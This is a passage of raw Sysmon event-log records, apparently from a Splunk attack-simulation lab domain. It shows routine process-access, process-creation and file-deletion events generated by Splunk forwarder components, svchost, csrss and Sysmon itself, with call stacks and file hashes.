Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.905{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.440{466BC892-F4D2-60EB-397D-00000000CF01}97568676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.239{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.220{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21BB72E721255AE59A357E393D89760,SHA256=BEE5F25FA36A4A4FEE1A36B81892DB55B026A6696505EA1EEC6E478206AB9A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:51.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F218963AB945458A476215D54E8760E2,SHA256=44E20F554DCA50AC5D8E3D7F0B0AFEE480576899A1F4A178BDABA0490B64D5CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.824{466BC892-F4D3-60EB-3B7D-00000000CF01}97329636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.593{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E22B53E6B329AC383EA127CDABCBF71A,SHA256=9DBA31FEDB2B207937131644687BEE044B7014CF546A685E51346981058E150E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B68AA1E2EF1D1A8C16B475DA0E70F10,SHA256=67F9013B489E7AD95305042ECC1D3C8A8BFFF02A94047AE0CFA675383DBB0051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E463D6417AC5A85C855CA57A74ECD44,SHA256=799B113E8903A63F23944D77AEA267D394BD2D04ABCD3A1DC54CD6711AA87383,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 